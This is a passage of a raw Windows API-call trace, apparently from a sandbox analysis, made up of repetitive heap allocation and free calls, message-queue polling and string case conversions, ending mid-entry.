dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0266.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0266.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0266.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0266.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.374] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0266.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0266.374] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0266.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.374] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0266.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0266.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0266.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0266.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.375] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0266.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0266.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0266.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0266.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0266.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0266.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0266.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0266.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0266.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0266.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0266.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0266.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0266.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0266.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0266.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0266.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0266.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0266.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0266.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0266.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0266.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0266.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0266.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0266.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0266.378] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.378] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0266.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0266.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0266.378] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.378] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0266.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0266.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0266.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0266.378] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0266.378] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.378] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0266.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0266.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0266.379] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.379] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0266.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0266.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0266.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0266.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0266.379] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0266.379] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0266.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0266.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0266.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0266.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0266.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0266.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0266.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0266.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0266.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0266.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0266.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0266.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0266.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0266.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0266.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0266.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0266.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0266.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0266.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0266.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0266.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0266.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0266.382] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.382] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.382] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0266.382] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0266.382] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0266.382] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0266.382] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0266.382] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.382] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.382] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.382] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.382] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.382] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.382] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0266.382] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.383] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0266.383] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.383] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.383] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.383] CryptReleaseContext (hProv=0xad2be8, dwFlags=0x0) returned 1 [0266.383] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.383] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.383] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.383] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.383] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.383] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.383] FreeLibrary (hLibModule=0x74d40000) returned 1 [0266.383] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.383] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.384] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0266.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0266.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0266.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0266.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0266.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0266.384] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0266.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0266.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0266.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0266.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0266.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0266.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.385] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0266.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0266.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.386] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0266.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0266.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0266.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0266.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0266.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0266.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0266.386] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: 